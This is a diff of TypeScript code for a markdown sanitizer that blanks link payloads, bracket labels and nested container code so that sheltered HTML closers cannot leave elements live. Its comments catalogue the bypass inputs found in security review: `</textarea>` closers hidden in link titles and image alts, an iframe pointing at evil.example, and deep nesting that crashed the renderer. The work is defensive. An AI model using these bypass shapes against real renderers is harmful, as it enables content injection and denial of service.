+ * else, because it scans the masked copy. (The pipeline's own comment pass
2013
+ * still runs last over the REAL mask; this is a separate string.)
2014
+ *
2015
+ * OVER-BLANKING HERE IS FREE: fewer references means more definitions look
2016
+ * unreferenced, which blanks MORE of the haystack — the fail-CLOSED direction.
2017
+ * That is why this copy may apply passes out of the pipeline's order and may
2018
+ * use a block model that only approximates remark's.
2019
+ */
2020
+ function footnoteReferenceMask(masked: string, folded: string): string {
2021
+ let ref = blankInlineLinkPayloads(masked, folded)
2022
+ ref = blankBracketLabels(ref, folded, { footnoteLabels: false })
2023
+ ref = blankRanges(
2024
+ ref,
2025
+ mergeRanges(computeHtmlBlockRanges(folded).map(({ start, end }) => [start, end])),
2026
+ )
2027
+ ref = blankComments(ref, ref)
2028
+ ref = ref.replace(AUTOLINK_LIKE_RE, (m) => ' '.repeat(m.length))
2029
+ return blankTagAttributes(ref)
2030
+ }
2031
+
2032
+ /** AUTOLINKS, both spellings, DELIBERATELY over-wide (this regex is only ever
2033
+ * applied to the reference-counting copy, where over-blanking is free): a
2034
+ * CommonMark `<scheme:…>` autolink and a GFM LITERAL autolink both become an
2035
+ * `href`, so `<https://e.example/[^f]>` and `https://e.example/x[^f]y` are
2036
+ * phantom references — each reproduced a live iframe. It stops at whitespace,
2037
+ * so an ordinary `see https://e.example [^f]` keeps its REAL reference. Email
2038
+ * autolinks are deliberately absent: a `[` voids the email shape, so `[^f]`
2039
+ * inside one IS a real reference (verified — remark emits the footnote). */
2040
+ const AUTOLINK_LIKE_RE = /<[a-z][a-z0-9+.-]{1,31}:[^\s<>]*>|(?:https?:\/\/|www\.)[^\s<]*/gi
2041
+
2042
+ /** Blank the ATTRIBUTE RUN of every tag-like span, length-preserving. Blanking
2043
+ * the WHOLE tag would blank real `</tag>` closers too, so only the run between
2044
+ * the tag name and the `>` is cleared. Shared by `buildCloserHaystack`'s final
2045
+ * step and by `footnoteReferenceMask`, where an INLINE tag's attribute is one
2046
+ * more region remark never resolves a `[^f]` in (`<span title="[^f]">`
2047
+ * reproduced a live iframe). */
2048
+ function blankTagAttributes(masked: string): string {
2049
+ return masked.replace(
2050
+ TAG_LIKE_REGEX,
2051
+ (_m, slash: string, tag: string, rest: string, selfClose: string) =>
2052
+ `<${slash}${tag}${' '.repeat(rest.length)}${selfClose}>`,
2053
+ )
2054
+ }
2055
+
2056
+ /** Leading indent of `c` in COLUMNS (tabs advance to the next multiple of 4)
2057
+ * measured PAST the blockquote run, which is the column GFM measures a
2058
+ * footnote's continuation blocks at. */
2059
+ function footnoteIndentCols(c: string): number {
2060
+ FOOTNOTE_QUOTE_PREFIX_RE.lastIndex = 0
2061
+ let q = FOOTNOTE_QUOTE_PREFIX_RE.exec(c)![0].length
2062
+ let col = 0
2063
+ for (; q < c.length && isSpaceTab(c[q]); q++) col = c[q] === '\t' ? col + 4 - (col % 4) : col + 1
2064
+ return col
2065
+ }
2066
+
2067
+ /**
2068
+ * Blank the PARENTHESISED PAYLOAD of an INLINE link or image (round 19 —
2069
+ * SECURITY, a whole shelter class the table did not name).
2070
+ *
2071
+ * remark consumes an inline link's DESTINATION and TITLE exactly as it consumes
2072
+ * a reference definition's: both become href/title ATTRIBUTES on the emitted
2073
+ * node and never reach the document as HTML. So a `</textarea>` written in
2074
+ * either one is not a closer — but `blankLinkDefinitions` only covers the
2075
+ * DEFINITION spelling, and no pass covered the inline one. All eight spellings
2076
+ * reproduced live (`escapeUnknownHtmlTags` byte-identical, one live
2077
+ * `<textarea>` swallowing the prose above it):
2078
+ *
2079
+ * [a](/x "</textarea>") [a](/x '</textarea>') [a](/x (</textarea>))
2080
+ * ![a](/x "</textarea>") [a](</textarea>) > [a](/x "</textarea>")
2081
+ * - [a](/x "</textarea>") See [a](/x "</textarea>") for more.
2082
+ *
2083
+ * …and the escalation: an `<iframe src="…" width="600">` opener plus a title
2084
+ * shelter yields a LIVE iframe retaining both attributes.
2085
+ *
2086
+ * ONLY THE PAYLOAD IS BLANKED HERE, never the `[…]` text of an INLINE LINK
2087
+ * (`[text](dest)`). That text is INLINE-PARSED and reaches the document as
2088
+ * HTML, so blanking it would over-escape a paired `<textarea>…</textarea>`
2089
+ * written inside a link label. The bracket text of every OTHER spelling — an
2090
+ * IMAGE's alt, a reference LABEL, a footnote LABEL — is consumed into an
2091
+ * attribute or an identifier instead, and is blanked by `blankBracketLabels`
2092
+ * below. Round 20 found that half uncovered.
2093
+ *
2094
+ * CONTAINER-AGNOSTIC BY CONSTRUCTION, like `blankLinkDefinitions` and
2095
+ * `blankComments`: the scan is anchored on the `](` bigram with no column or
2096
+ * prefix anchoring, so a blockquote run or list marker is ordinary text ahead of
2097
+ * it and the single top-level call covers every container nesting.
2098
+ *
2099
+ * FAIL DIRECTION: blanks ONLY on a payload that parses through to its closing
2100
+ * `)`. A shape that does not parse is not a link to remark either, so its
2101
+ * `</textarea>` IS a real closer and must stay visible — declining to blank is
2102
+ * the correct answer there, not a gap. Conversely the parse is deliberately
2103
+ * LOOSER than CommonMark (it accepts payloads remark would reject, e.g. after a
2104
+ * `](`-shaped bigram in ordinary prose), and every such over-detection only
2105
+ * hides closers, i.e. escapes MORE openers.
2106
+ *
2107
+ * THE CAP IS A BLANKING BOUNDARY, NOT A REJECTION (round 20 — SECURITY).
2108
+ * `INLINE_LINK_PAYLOAD_MAX` bounds how far one `](` may blank, so a stray
2109
+ * bigram cannot blank an unbounded tail. It was originally spent as `return -1`
2110
+ * on every over-limit exit, which the caller reads as "not a link, leave
2111
+ * visible" — so `[a](/x "<1100 chars></textarea>")` sheltered its closer in
2112
+ * full view of the mask (`escapeUnknownHtmlTags` byte-identical, one live
2113
+ * RAWTEXT element; the `<iframe src=… width=…>` spelling kept both attributes).
2114
+ * CommonMark places NO length bound on a destination or a title, so that is
2115
+ * ordinary output, and this is the SAME fail-open shape `ba4a526b` closed for
2116
+ * over-cap inline code spans, reintroduced in newer code.
2117
+ *
2118
+ * A CAP-driven exit therefore returns `limit` — "blank through the cap" — while
2119
+ * a SHAPE-driven exit still returns -1. The two are distinguished by testing
2120
+ * `q >= limit` BEFORE the shape test at every exit; over-blanking a bounded
2121
+ * window is the fail-CLOSED direction, declining on a genuinely unparseable
2122
+ * shape is the deliberate one.
2123
+ *
2124
+ * AND THE CAP-DRIVEN EXIT MUST BLANK PAST THE CAP, not to it. Blanking exactly
2125
+ * `[from, limit)` still leaves the shelter live whenever the sheltered closer
2126
+ * sits BEYOND the cap — which is the ordinary case, since the filler is what
2127
+ * pushed the payload over it (measured: `[a](/x "<1100 y's></textarea>")` was
2128
+ * STILL a byte-identical no-op with a to-the-cap blank). So the caller widens a
2129
+ * capped payload to the end of its PARAGRAPH — CommonMark's own bound, since
2130
+ * neither a destination nor a title may contain a blank line. The cap therefore
2131
+ * only decides WHEN to stop parsing, never how little to blank, and a stray
2132
+ * `](` still cannot blank an unbounded tail: it fails on SHAPE and blanks
2133
+ * nothing.
2134
+ *
2135
+ * "FAILS ON SHAPE" HAS TO INCLUDE RUNNING OUT OF INPUT (round 22). It did not:
2136
+ * `limit` is `min(s.length, from + MAX)`, so a payload that simply reached the
2137
+ * END OF THE DOCUMENT hit the same `q >= limit` tests as a capped one and
2138
+ * returned `limit`, which the caller widened to `paragraphEnd`. `see [a](/x` at
2139
+ * end of input therefore blanked its paragraph tail (`see [a]( `) even though
2140
+ * nothing there is a link. Safe direction, but that is the COMMON shape while
2141
+ * STREAMING — the last token of a partial message is often a half-written link
2142
+ * — so an earlier opener was escaped mid-stream and unescaped when the link
2143
+ * completed, a visible flicker. The two are now distinguished by `overflow`:
2144
+ * `limit` only when input remains PAST the cap, -1 when the input is exhausted.
2145
+ * The cap path still blanks THROUGH (round 20's fix is untouched).
2146
+ */
2147
+ const INLINE_LINK_PAYLOAD_MAX = 1024
2148
+
2149
+ const isInlineSpace = (ch: string): boolean =>
2150
+ ch === ' ' || ch === '\t' || ch === '\n' || ch === '\r' || ch === '\f' || ch === '\v'
2151
+
2152
+ /** Index of the payload's closing `)`, or the cap index when the payload runs
2153
+ * past `INLINE_LINK_PAYLOAD_MAX` (blank through the cap), or -1 when the shape
2154
+ * does not parse. `from` is the index just past the `](`. */
2155
+ function parseInlineLinkPayload(s: string, from: number): number {
2156
+ const limit = Math.min(s.length, from + INLINE_LINK_PAYLOAD_MAX)
2157
+ // What a `q >= limit` exit MEANS, which is not one thing (round 22):
2158
+ // - the CAP truncated a payload that still has input after it → `limit`,
2159
+ // "blank through the cap" (round 20; the caller widens to `paragraphEnd`);
2160
+ // - the INPUT RAN OUT → -1, a SHAPE decline. Nothing closed the payload and
2161
+ // nothing ever will in this document, so it is not a link to remark
2162
+ // either. This is the ordinary STREAMING tail (`see [a](/x` as the last
2163
+ // token), where returning `limit` widened the blank to the paragraph end
2164
+ // and escaped an earlier opener that unescaped again once the link
2165
+ // completed — a visible flicker.
2166
+ const overflow = limit < s.length ? limit : -1
2167
+ let q = from
2168
+ while (q < limit && isInlineSpace(s[q])) q++
2169
+ // DESTINATION — angle-bracketed, or a bare run with BALANCED parens.
2170
+ if (s[q] === '<') {
2171
+ q++
2172
+ while (q < limit && s[q] !== '>' && s[q] !== '\n') q += s[q] === '\\' ? 2 : 1
2173
+ if (q >= limit) return overflow
2174
+ if (s[q] !== '>') return -1
2175
+ q++
2176
+ } else {
2177
+ let depth = 0
2178
+ while (q < limit) {
2179
+ const ch = s[q]
2180
+ if (ch === '\\') {
2181
+ q += 2
2182
+ continue
2183
+ }
2184
+ if (isInlineSpace(ch)) break
2185
+ if (ch === '(') depth++
2186
+ else if (ch === ')') {
2187
+ if (depth === 0) break
2188
+ depth--
2189
+ }
2190
+ q++
2191
+ }
2192
+ if (q >= limit) return overflow
2193
+ if (depth !== 0) return -1
2194
+ }
2195
+ // TITLE — `"…"`, `'…'` or `(…)`, separated from the destination by space.
2196
+ const beforeGap = q
2197
+ while (q < limit && isInlineSpace(s[q])) q++
2198
+ const open = s[q]
2199
+ if (q > beforeGap && (open === '"' || open === "'" || open === '(')) {
2200
+ const close = open === '(' ? ')' : open
2201
+ let depth = 1
2202
+ q++
2203
+ while (q < limit) {
2204
+ const ch = s[q]
2205
+ if (ch === '\\') {
2206
+ q += 2
2207
+ continue
2208
+ }
2209
+ if (open === '(' && ch === '(') depth++
2210
+ else if (ch === close && --depth === 0) break
2211
+ q++
2212
+ }
2213
+ if (q >= limit) return overflow
2214
+ if (s[q] !== close) return -1
2215
+ q++
2216
+ while (q < limit && isInlineSpace(s[q])) q++
2217
+ }
2218
+ if (q >= limit) return overflow
2219
+ return s[q] === ')' ? q : -1
2220
+ }
2221
+
2222
+ /** Start index of the first BLANK line at or after `from`, i.e. the end of the
2223
+ * paragraph `from` sits in — the widest span an inline construct may cover. */
2224
+ function paragraphEnd(s: string, from: number): number {
2225
+ let lineStart = s.indexOf('\n', from)
2226
+ while (lineStart !== -1) {
2227
+ lineStart += 1
2228
+ const next = s.indexOf('\n', lineStart)
2229
+ const line = s.slice(lineStart, next === -1 ? s.length : next)
2230
+ if (isBlankLine(line)) return lineStart
2231
+ if (next === -1) break
2232
+ lineStart = next
2233
+ }
2234
+ return s.length
2235
+ }
2236
+
2237
+ function blankInlineLinkPayloads(masked: string, source: string): string {
2238
+ const ranges: Array<[number, number]> = []
2239
+ let i = source.indexOf('](')
2240
+ while (i !== -1) {
2241
+ const from = i + 2
2242
+ const cap = Math.min(source.length, from + INLINE_LINK_PAYLOAD_MAX)
2243
+ const close = parseInlineLinkPayload(source, from)
2244
+ if (close < 0) {
2245
+ i = source.indexOf('](', i + 1)
2246
+ continue
2247
+ }
2248
+ // A CAPPED payload (`close === cap`) has an unknown end, so blank to the end
2249
+ // of the paragraph — see the docblock. A parsed one blanks exactly.
2250
+ const end = close >= cap ? paragraphEnd(source, from) : close
2251
+ if (end > from) ranges.push([from, end])
2252
+ // Ascending and non-overlapping: resume past the range just blanked.
2253
+ i = source.indexOf('](', Math.max(end, from))
2254
+ }
2255
+ return blankRanges(masked, ranges)
2256
+ }
2257
+
2258
+ /** Sort + merge so overlapping/nested finds satisfy `blankRanges`' contract
2259
+ * (non-overlapping, ascending). Empty ranges are dropped. */
2260
+ function mergeRanges(ranges: Array<[number, number]>): Array<[number, number]> {
2261
+ ranges.sort((a, b) => a[0] - b[0])
2262
+ const out: Array<[number, number]> = []
2263
+ for (const [from, to] of ranges) {
2264
+ if (to <= from) continue
2265
+ const last = out[out.length - 1]
2266
+ if (last && from <= last[1]) {
2267
+ if (to > last[1]) last[1] = to
2268
+ } else out.push([from, to])
2269
+ }
2270
+ return out
2271
+ }
2272
+
2273
+ /**
2274
+ * Blank the BRACKET TEXT of every spelling remark consumes into an ATTRIBUTE or
2275
+ * an IDENTIFIER (round 20 — SECURITY, the other half of the shelter class
2276
+ * `blankInlineLinkPayloads` opened).
2277
+ *
2278
+ * Round 19 wrote the general rule — "every region CommonMark turns into an
2279
+ * ATTRIBUTE rather than document text is a shelter of the same kind" — and then
2280
+ * implemented only the `(…)` payload half of it, on a rationale ("never the
2281
+ * `[…]` link TEXT, which is inline-parsed and may hold real HTML") that is true
2282
+ * of an INLINE LINK and false of every other bracket spelling. All seven
2283
+ * reproduced live, in BOTH renderers, with `escapeUnknownHtmlTags` returning the
2284
+ * input BYTE-IDENTICAL and a live RAWTEXT element swallowing the prose:
2285
+ *
2286
+ * ![</textarea>](/x) → alt="</textarea>" (string attribute)
2287
+ * ![</textarea>][r] → alt="…" (reference image)
2288
+ * [a][</textarea>] → label → identifier, never rendered
2289
+ * [</textarea>][] → collapsed reference, identifier again
2290
+ * See[^</textarea>] → href="#user-content-fn-%3C/textarea%3E"
2291
+ * > ![</textarea>](/x) · - ![</textarea>](/x) (container-nested)
2292
+ *
2293
+ * …plus the escalation: `<iframe src="https://evil.example/x" width="600">` in
2294
+ * prose above `![</iframe>](/x)` yielded a LIVE iframe retaining `src`, `width`
2295
+ * and `height`.
2296
+ *
2297
+ * WHAT IS CLAIMED, AND WHAT IS DELIBERATELY NOT:
2298
+ *
2299
+ * - a `[…]` whose `[` is immediately preceded by `!` — an image's alt is a
2300
+ * STRING attribute in every image spelling (inline, reference, collapsed,
2301
+ * shortcut), so the bracket text never reaches the document as HTML;
2302
+ * - the SECOND `[…]` of a `][` adjacency — a FULL reference's label, which
2303
+ * remark resolves to a definition and never renders;
2304
+ * - the FIRST `[…]` of a `][]` adjacency — a COLLAPSED reference, whose
2305
+ * bracket text IS the identifier. (remark also inline-parses it for display,
2306
+ * so unlike an alt this one is not purely an attribute; blanking it is the
2307
+ * fail-CLOSED direction and the reviewer-confirmed shelter, not a claim that
2308
+ * the text is unrendered.)
2309
+ * - a footnote LABEL, `[^…]`, in BOTH the reference and the definition —
2310
+ * remark percent-encodes it into `href`/`id`. Only the LABEL: round 19 was
2311
+ * right that a footnote definition's BODY is BLOCK-parsed and may hold real
2312
+ * HTML, which is why `blankLinkDefinitions` refuses the whole line.
2313
+ * - NOT the `[…]` of an inline `[text](…)` link, and NOT a bare SHORTCUT
2314
+ * reference `[label]`: in both, remark emits the bracket text as inline
2315
+ * HTML, so a `</textarea>` there IS a real closer and must stay visible.
2316
+ * (Verified: with a live opener above it, that closer pairs.)
2317
+ *
2318
+ * The reference spellings are NOT reachable from the `](`-anchored scan in
2319
+ * `blankInlineLinkPayloads` — there is no `](` in `![x][r]` or `[a][r]` at all —
2320
+ * so this pass carries its own anchors.
2321
+ *
2322
+ * CONTAINER-AGNOSTIC BY CONSTRUCTION, like `blankInlineLinkPayloads`,
2323
+ * `blankLinkDefinitions` and `blankComments`: a single left-to-right bracket
2324
+ * walk with no column or prefix anchoring, so a blockquote run or list marker is
2325
+ * ordinary text ahead of it and ONE top-level call covers every nesting.
2326
+ *
2327
+ * FAIL DIRECTION: brackets that do not resolve to a link/image at all (ordinary
2328
+ * prose `see [1][2]`) are still blanked. Every such over-detection only hides
2329
+ * closers, i.e. escapes MORE openers. A backslash escape is consumed as a pair,
2330
+ * so `\[` does not open a group; `\!` still leaves the following `[` looking
2331
+ * image-like, which over-blanks in the same safe direction.
2332
+ */
2333
+ function blankBracketLabels(
2334
+ masked: string,
2335
+ source: string,
2336
+ { footnoteLabels = true }: { footnoteLabels?: boolean } = {},
2337
+ ): string {
2338
+ if (source.indexOf('[') === -1) return masked
2339
+ const ranges: Array<[number, number]> = []
2340
+ /** Open `[` positions, innermost last. */
2341
+ const open: number[] = []
2342
+ /**
2343
+ * The most recently CLOSED group AT EACH NESTING DEPTH, for the `][` / `][]`
2344
+ * adjacencies. Round 23: this used to be a SINGLE `prev`, which any NESTED
2345
+ * group clobbered — so in `[txt][[^f]]` the outer second group (a full
2346
+ * reference's LABEL) was compared against the INNER `[^f]` instead of against
2347
+ * `[txt]`, the adjacency failed and the label was never blanked. That spelling
2348
+ * was a live fail-open through `blankUnreferencedFootnotes`' phantom count.
2349
+ * Depth-keyed, siblings are compared with siblings.
2350
+ */
2351
+ const prevByDepth: Array<{ open: number; close: number } | null> = []
2352
+ for (let i = 0; i < source.length; i++) {
2353
+ const ch = source[i]
2354
+ if (ch === '\\') {
2355
+ i++
2356
+ continue
2357
+ }
2358
+ if (ch === '[') {
2359
+ open.push(i)
2360
+ // Whatever closed at this depth before belongs OUTSIDE the group just
2361
+ // opened, so it cannot be adjacent to anything inside it.
2362
+ prevByDepth[open.length] = null
2363
+ continue
2364
+ }
2365
+ if (ch !== ']') continue
2366
+ const from = open.pop()
2367
+ if (from === undefined) {
2368
+ prevByDepth[0] = null
2369
+ continue
2370
+ }
2371
+ const prev = prevByDepth[open.length] ?? null
2372
+ // IMAGE alt — `![…]`, every image spelling.
2373
+ if (from > 0 && source[from - 1] === '!') ranges.push([from + 1, i])
2374
+ // FOOTNOTE label — `[^…]`, reference and definition alike. Suppressed for
2375
+ // the reference-counting copy only (`footnoteReferenceMask`), where blanking
2376
+ // the labels would erase the very references being counted.
2377
+ if (footnoteLabels && source[from + 1] === '^') ranges.push([from + 2, i])
2378
+ // REFERENCE label — the second group of `[…][…]`, or, when that group is
2379
+ // EMPTY (`[…][]`), the first group, which is then the identifier.
2380
+ if (prev !== null && prev.close === from - 1) {
2381
+ if (i === from + 1) ranges.push([prev.open + 1, prev.close])
2382
+ else ranges.push([from + 1, i])
2383
+ }
2384
+ prevByDepth[open.length] = { open: from, close: i }
2385
+ }
2386
+ return blankRanges(masked, mergeRanges(ranges))
2387
+ }
2388
+
2389
+ /** `> ` / `>` container prefixes, including nested ones (`> > `). */
2390
+ const BLOCKQUOTE_PREFIX_RE = /^(?: {0,3}>[ \t]?)+/
2391
+
2392
+ /**
2393
+ * EXACT NO-OP GUARDS for the container cross-calls (round 19 — performance).
2394
+ *
2395
+ * `blankQuotedCode` and `blankListItemCode` each call the other and
2396
+ * `blankListItemCode` now calls itself, and each of those calls walks the run
2397
+ * and folds the WHOLE document through `blankRanges` per flush. Widening the
2398
+ * list gate to `top >= 1` made every ordinary `- ` item open a run, so a
2399
+ * list-dense document paid that constant on every line (measured 3.1x at
2400
+ * 989 KB before these guards).
2401
+ *
2402
+ * Both guards are EXACT, not heuristic: `blankQuotedCode` only ever opens a run
2403
+ * on a line `BLOCKQUOTE_PREFIX_RE` matches and `blankListItemCode` only ever
2404
+ * pushes a column for a line `LIST_MARKER_RE` matches, so a run containing no
2405
+ * such line produces no runs at all and returns `masked` byte-identical. Skipping
2406
+ * a provable identity cannot change coverage — do NOT weaken either predicate
2407
+ * into an approximation of "probably nothing here"; that is how the eight
2408
+ * fail-open instances above were born.
2409
+ */
2410
+ const hasListMarker = (line: MaskLine): boolean => LIST_MARKER_RE.test(line.content)
2411
+ const hasQuotePrefix = (line: MaskLine): boolean => BLOCKQUOTE_PREFIX_RE.test(line.content)
2412
+
2413
+ /**
2414
+ * WINDOWED RUNS (round 19 — performance, and the same lesson as `blankRanges`
2415
+ * one level up).
2416
+ *
2417
+ * `blankRanges` is O(document): it rebuilds the whole string. The container
2418
+ * passes used to hand it the WHOLE document once per nested pass PER RUN, so a
2419
+ * document that is one long sequence of list/quote runs paid O(runs × document)
2420
+ * — a second quadratic, sitting directly above the one round 18 removed.
2421
+ * Widening the list gate to `top >= 1` tripled the run count and made it
2422
+ * visible: a 989 KB all-fenced-in-list-items document went 320 ms → 1006 ms.
2423
+ *
2424
+ * Runs are DISJOINT and ASCENDING, and every range any nested pass produces
2425
+ * lies inside its own run's span (fence ranges start at `line.start`, every
2426
+ * other pass at `line.contentStart`). So a run can be masked in ISOLATION, on a
2427
+ * window sliced out of the caller's baseline with all offsets rebased, and the
2428
+ * windows spliced back in ONE fold at the end. Same output, one document
2429
+ * rebuild per pass instead of one per run.
2430
+ *
2431
+ * Do not reintroduce a per-run fold; a container pass that reassigns the whole
2432
+ * `masked` inside its `flush` is the regression.
2433
+ */
2434
+ function rebaseRun(run: MaskLine[], from: number): MaskLine[] {
2435
+ return run.map((line) => ({
2436
+ start: line.start - from,
2437
+ contentStart: line.contentStart - from,
2438
+ content: line.content,
2439
+ }))
2440
+ }
2441
+
2442
+ function spliceWindows(masked: string, edits: Array<[number, number, string]>): string {
2443
+ if (edits.length === 0) return masked
2444
+ const parts: string[] = []
2445
+ let cursor = 0
2446
+ for (const [from, to, text] of edits) {
2447
+ if (from > cursor) parts.push(masked.slice(cursor, from))
2448
+ parts.push(text)
2449
+ cursor = to
2450
+ }
2451
+ parts.push(masked.slice(cursor))
2452
+ return parts.join('')
2453
+ }
2454
+
2455
+ /** The window a run occupies: from the first line's START (fence ranges are
2456
+ * anchored there, before any container prefix) to the last line's END. */
2457
+ function runWindow(run: MaskLine[]): [number, number] {
2458
+ const last = run[run.length - 1]
2459
+ return [run[0].start, last.contentStart + last.content.length]
2460
+ }
2461
+
2462
+ /**
2463
+ * CONTAINER NESTING DEPTH GUARD — and it FAILS CLOSED (round 19).
2464
+ *
2465
+ * The round-17 termination note claimed the mutual recursion was "verified
2466
+ * empirically on `> - ` alternation nested 1/2/5/20/100/500/2000/8000 levels
2467
+ * deep … no throw, ≤4 ms, and the observed recursion depth CAPPED AT 4". THAT
2468
+ * CLAIM IS FALSE and was false when written: HEAD throws `RangeError: Maximum
2469
+ * call stack size exceeded` on that exact input from depth ~2000 up. The
2470
+ * recursion terminates (the measure argument is sound) but its DEPTH is bounded
2471
+ * only by input length, and V8's stack is not. A `RangeError` out of the
2472
+ * sanitizer is a rendering crash, i.e. a denial of service on a 24 KB message.
2473
+ *
2474
+ * Round 19's list self-recursion widened the trigger (a single line of `- `
2475
+ * markers overflows from depth ~4000, where HEAD survived because
2476
+ * `LIST_MARKER_RE` matches only the first marker), so the guard lands here.
2477
+ *
2478
+ * THE GUARD IS NOT A COVERAGE HOLE. At the limit the run is not skipped — it is
2479
+ * BLANKED WHOLE, which is the strictly more aggressive answer and exactly the
2480
+ * fail direction this module rounds towards everywhere else. A markdown document
2481
+ * nested 64 containers deep is a code sample rendered as escaped text, not a
2482
+ * shelter. Do NOT convert this into a `return` / `continue`: skipping is the
2483
+ * fail-OPEN direction and would be a new instance of the class.
2484
+ */
2485
+ const CONTAINER_NEST_LIMIT = 64
2486
+
2487
+ /**
2488
+ * Blank code regions inside BLOCKQUOTES.
2489
+ *
2490
+ * `FENCE_RE` matches at column 0..3, so a fence inside a quote (```` > ```html ````)
2491
+ * is invisible to the top-level tracker — and a blockquoted code sample is an
2492
+ * utterly ordinary chat answer ("here's the markup:" followed by a quoted
2493
+ * fence). The closer inside it satisfied `hasLaterCloser` and the prose opener
2494
+ * above stayed live.
2495
+ *
2496
+ * CHOSEN APPROACH: strip the quote prefix off each run of quoted lines and run
2497
+ * a NESTED tracker (plus the indented-code rule) over the stripped content,
2498
+ * blanking only the code regions found. The blunter alternative — blank every
2499
+ * `^ {0,3}>` line — is also sound (it only over-blanks) but it would escape a
2500
+ * legitimately PAIRED `<textarea>…</textarea>` written inside a blockquote,
2501
+ * turning quoted HTML into visible `&lt;…&gt;` source. The nested scan costs
2502
+ * one extra line walk and keeps that shape rendering.
2503
+ *
2504
+ * ---------------------------------------------------------------------------
2505
+ * MUTUAL RECURSION — TERMINATION (round 17)
2506
+ * ---------------------------------------------------------------------------
2507
+ * `blankQuotedCode` and `blankListItemCode` now call EACH OTHER (the missing
2508
+ * quote→list direction was the seventh instance of the fail-open class). The
2509
+ * recursion terminates on the measure `M(run) = Σ line.content.length`:
2510
+ *
2511
+ * - `blankQuotedCode` only puts a line in a run when `BLOCKQUOTE_PREFIX_RE`
2512
+ * matches, and that pattern is `(?: {0,3}>[ \t]?)+` — at least one `>`, so
2513
+ * the stripped content is at least 1 char SHORTER. Blank lines never match
2514
+ * (they carry no `>`), so EVERY line in a quoted run strictly shortens.
2515
+ * - `blankListItemCode` only puts a line in a run when the content column
2516
+ * `top >= 1` (round 19 — was `>= 4`), and `charIndexAtColumn(content, top)`
2517
+ * with `top >= 1` returns an index `>= 1` (it can only return 0 when the
2518
+ * requested column is 0), so that line strictly shortens too. ROUND-19
2519
+ * RE-VERIFICATION: the same bound covers the new SELF-recursion — the run it
2520
+ * hands itself is cut at the same `top >= 1`, so `M` strictly decreases
2521
+ * across that call exactly as across the `blankQuotedCode` one. ROUND-18
2522
+ * RE-VERIFICATION: this also
2523
+ * covers the MARKER LINE, whose cut lands at `marker[0].length` (or
2524
+ * `markerEnd + 1` under the clamp) — both `>= 2` for every marker spelling,
2525
+ * so the bound `cut >= 1` is unchanged and the measure still strictly
2526
+ * decreases. The reorder moved WHICH lines join a run, not the shortening
2527
+ * property that makes the recursion finite. It also carries blank separators into an
2528
+ * ALREADY-OPEN run as `content: ''` (length 0 ≤ original), and a run is only
2529
+ * ever opened by a non-blank, strictly-shortened line.
2530
+ *
2531
+ * So each nested call is handed a run whose measure is strictly smaller than
2532
+ * the caller's, `M` is a non-negative integer, and the chain is finite.
2533
+ *
2534
+ * ---------------------------------------------------------------------------
2535
+ * FINITE IS NOT THE SAME AS SHALLOW (round 19 — the third false claim)
2536
+ * ---------------------------------------------------------------------------
2537
+ * Round 17 concluded here: "It is bounded by input length, so no depth guard is
2538
+ * added — there is no non-shortening case to guard against, and a speculative
2539
+ * bound would be a second, untested policy. Verified empirically on `> - `
2540
+ * alternation nested 1/2/5/20/100/500/2000/8000 levels deep (240 KB source):
2541
+ * length invariant held, no throw, ≤4 ms, and the observed recursion depth
2542
+ * CAPPED AT 4 regardless of nesting."
2543
+ *
2544
+ * THE EMPIRICAL PART OF THAT IS FALSE, and was false when written. Re-run on the
2545
+ * described input, HEAD raises `RangeError: Maximum call stack size exceeded`
2546
+ * from depth ~2000 up — a 24 KB message crashes the renderer. The depth cap of 4
2547
+ * held only for the shapes round 17 happened to try; `BLOCKQUOTE_PREFIX_RE`
2548
+ * consumes a `> > >` nest in one match, but an ALTERNATING `> - > - …` line
2549
+ * gives each pass exactly one level to strip and the chain is as deep as the
2550
+ * line is long. Round 19's list self-recursion widened it further (a plain `- `
2551
+ * run overflows from ~4000, where HEAD survived only because `LIST_MARKER_RE`
2552
+ * matches the first marker alone).
2553
+ *
2554
+ * Termination was never the property at risk — STACK DEPTH was, and "bounded by
2555
+ * input length" is precisely the bound that does not help. `CONTAINER_NEST_LIMIT`
2556
+ * now caps it, blanking an over-deep run WHOLE rather than recursing, which is
2557
+ * fail-CLOSED and therefore not a coverage hole. Pinned by
2558
+ * `masks arbitrarily deep container nesting without throwing` at depths up to
2559
+ * 40000 (469 KB, 11 ms, closer masked at every depth).
2560
+ */
2561
+ function blankQuotedCode(masked: string, lines: MaskLine[], depth = 0): string {
2562
+ let run: MaskLine[] = []
2563
+ // One edit per run, spliced in a SINGLE fold at the end — see `spliceWindows`.
2564
+ const edits: Array<[number, number, string]> = []
2565
+ const flush = () => {
2566
+ if (run.length === 0) return
2567
+ const [from, to] = runWindow(run)
2568
+ const wl = rebaseRun(run, from)
2569
+ let win = masked.slice(from, to)
2570
+ // Depth limit: blank the run WHOLE rather than recurse — see
2571
+ // `CONTAINER_NEST_LIMIT`. Fail-closed, never a skip.
2572
+ if (depth >= CONTAINER_NEST_LIMIT) {
2573
+ edits.push([from, to, blankRanges(win, [[0, win.length]])])
2574
+ run = []
2575
+ return
2576
+ }
2577
+ // The nested FENCE scan needs the unmasked `run` content (the inline-code
2578
+ // pass would have blinded it), but the nested INDENTED scan needs the CURRENT
2579
+ // mask — see `blankIndentedCode`'s SCAN-SOURCE INVERSION.
2580
+ const afterFences = blankFencedRegions(win, wl)
2581
+ win = blankIndentedCode(afterFences, remapToMask(afterFences, wl))
2582
+ win = blankLinkDefinitions(win, wl)
2583
+ // …and the LIST-container pass, mirroring the call `blankListItemCode`
2584
+ // already makes in the other direction. Without it a fenced sample inside a
2585
+ // LIST ITEM inside a QUOTE was seen by NO pass: `FENCE_RE` caps fence indent
2586
+ // at 3 ABSOLUTE columns, so at a quote-relative content column >= 4
2587
+ // (`> 1. ` / `> - ` / `> -\t`) the fence is invisible to the nested
2588
+ // tracker, and `blankIndentedCode`'s list-aware threshold (`contentCol + 4`)
2589
+ // starts at 8 and never reaches it either. Reproduced live for textarea and
2590
+ // iframe, at both list spellings, the tab spelling and depth-2 quotes;
2591
+ // `escapeUnknownHtmlTags` returned the input BYTE-IDENTICAL.
2592
+ if (wl.some(hasListMarker)) win = blankListItemCode(win, wl, depth + 1)
2593
+ edits.push([from, to, win])
2594
+ run = []
2595
+ }
2596
+ for (const line of lines) {
2597
+ const prefix = BLOCKQUOTE_PREFIX_RE.exec(line.content)
2598
+ if (!prefix) {
2599
+ flush()
2600
+ continue
2601
+ }
2602
+ run.push({
2603
+ start: line.start,
2604
+ contentStart: line.contentStart + prefix[0].length,
2605
+ content: line.content.slice(prefix[0].length),
2606
+ })
2607
+ }
2608
+ flush()
2609
